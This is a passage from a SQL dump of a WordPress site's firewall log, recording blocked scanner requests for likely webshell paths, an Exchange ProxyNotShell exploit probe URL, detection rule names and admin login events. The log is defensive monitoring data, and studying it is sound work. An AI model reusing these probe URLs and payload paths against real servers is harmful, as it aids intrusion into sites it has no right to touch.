customize-themes-section.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtdGhlbWVzLXNlY3Rpb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133466,1699888590.807710,1699888590.797900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-upload-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-upload-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtdXBsb2FkLWNvbnRyb2wucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133465,1699888591.148276,1699888591.139000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-sidebar-block-editor-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-sidebar-block-editor-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1zaWRlYmFyLWJsb2NrLWVkaXRvci1jb250cm9sLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133464,1699888591.494538,1699888591.485700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-widget-area-customize-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-widget-area-customize-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC13aWRnZXQtYXJlYS1jdXN0b21pemUtY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133463,1699888591.884771,1699888591.876100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-widget-form-customize-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-widget-form-customize-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC13aWRnZXQtZm9ybS1jdXN0b21pemUtY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133462,1699888592.555376,1699888592.546000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts/class-wp-font-face-resolver.php','http://eckankar-colorado.org/wp-includes/fonts/class-wp-font-face-resolver.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzL2NsYXNzLXdwLWZvbnQtZmFjZS1yZXNvbHZlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(135044,0.000000,1700583956.090602,0x00000000000000000000FFFF4C8278C6,0,302,0,2,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','loginOK',NULL,NULL),(135045,0.000000,1700584093.295450,0x00000000000000000000FFFFB860DB37,0,302,0,15,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','loginOK',NULL,NULL),(135046,1700584151.844161,1700584151.820100,0x00000000000000000000FFFFC2261647,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/konzept/includes/uploadify/uploadify.css',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2tvbnplcHQvaW5jbHVkZXMvdXBsb2FkaWZ5L3VwbG9hZGlmeS5jc3M=\",\"category\":\"brute-force\",\"ssl\":1}'),(135047,0.000000,1700584728.121231,0x00000000000000000000FFFF4C8278C6,1,200,0,2,0,'https://eckankar-colorado.org/wp-login.php?action=logout&_wpnonce=80e95af60a','https://eckankar-colorado.org/wp-admin/plugins.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','logout',NULL,NULL),(135043,1700582784.748418,1700582784.709500,0x00000000000000000000FFFF29D8BCA2,0,403,0,0,0,'https://eckankar-colorado.org/ms.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L21zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133461,1699888592.901127,1699888592.891800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts/class-wp-font-face.php','http://eckankar-colorado.org/wp-includes/fonts/class-wp-font-face.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzL2NsYXNzLXdwLWZvbnQtZmFjZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(135042,1700582802.639224,1700582802.600600,0x00000000000000000000FFFF29D8BCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/about.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133460,1699888593.940980,1699888593.932200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/pomo/entry.php','http://eckankar-colorado.org/wp-includes/pomo/entry.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BvbW8vZW50cnkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(135032,1700554395.660456,1700554395.630200,0x00000000000000000000FFFF6B97B63A,0,403,0,0,0,'https://173.231.231.205/autodiscover/autodiscover.json?a__foo_var%2Fowa%2F%3F=&Email=autodiscover%2Fautodiscover.json%3Fa..foo.var&Protocol=XYZ&FooProtocol=Powershell',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','blocked:waf','Exchange Proxy(Not?)Shell CVE-2022–41040 and CVE-2022–41082','{\"learningMode\":0,\"failedRules\":\"511\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L2F1dG9kaXNjb3Zlci9hdXRvZGlzY292ZXIuanNvbg==\",\"path\":\"L2F1dG9kaXNjb3Zlci9hdXRvZGlzY292ZXIuanNvbg==\",\"category\":\"rce\",\"ssl\":1}'),(135031,1700547638.112609,1700547638.072300,0x00000000000000000000FFFF14DB32E5,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Nsb3VkLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133459,1699888594.298992,1699888594.289800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/pomo/mo.php','http://eckankar-colorado.org/wp-includes/pomo/mo.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BvbW8vbW8ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(135033,0.000000,1700557333.268560,0x00000000000000000000FFFF8DA490D0,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','https://hikeinvan.com/administrator/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(135034,1700557732.990346,1700557732.952000,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/inputs.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2lucHV0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(135030,1700547621.978889,1700547621.955800,0x00000000000000000000FFFF14DB32E5,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2Nsb3VkLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(135029,1700547629.781936,1700547629.757000,0x00000000000000000000FFFF14DB32E5,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/css/colors/blue/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Nzcy9jb2xvcnMvYmx1ZS9jbG91ZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133458,1699888594.639026,1699888594.629600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/pomo/plural-forms.php','http://eckankar-colorado.org/wp-includes/pomo/plural-forms.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BvbW8vcGx1cmFsLWZvcm1zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(135035,1700562459.551246,1700562459.512600,0x00000000000000000000FFFF04F0526D,0,403,0,0,0,'https://eckankar-colorado.org/style.php?sig=update&domain=51.79.124.111','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(135028,1700547612.446585,1700547612.423600,0x00000000000000000000FFFF14DB32E5,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/css/colors/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Nzcy9jb2xvcnMvY2xvdWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133457,1699888594.982477,1699888594.973100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/pomo/po.php','http://eckankar-colorado.org/wp-includes/pomo/po.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BvbW8vcG8ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(135027,1700547606.361084,1700547606.337500,0x00000000000000000000FFFF14DB32E5,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/js/widgets/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2pzL3dpZGdldHMvY2xvdWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(135036,1700564021.187192,1700564021.148300,0x00000000000000000000FFFFC2A9AF5D,0,403,0,0,0,'https://eckankar-colorado.org/nf_tracking.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L25mX3RyYWNraW5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(135026,1700547592.351778,1700547592.328000,0x00000000000000000000FFFF14DB32E5,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/images/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2ltYWdlcy9jbG91ZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133456,1699888595.327123,1699888595.311800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/pomo/streams.php','http://eckankar-colorado.org/wp-includes/pomo/streams.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BvbW8vc3RyZWFtcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(135025,1700547598.408369,1700547598.385100,0x00000000000000000000FFFF14DB32E5,0,403,0,0,0,'https://eckankar-colorado.org/images/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 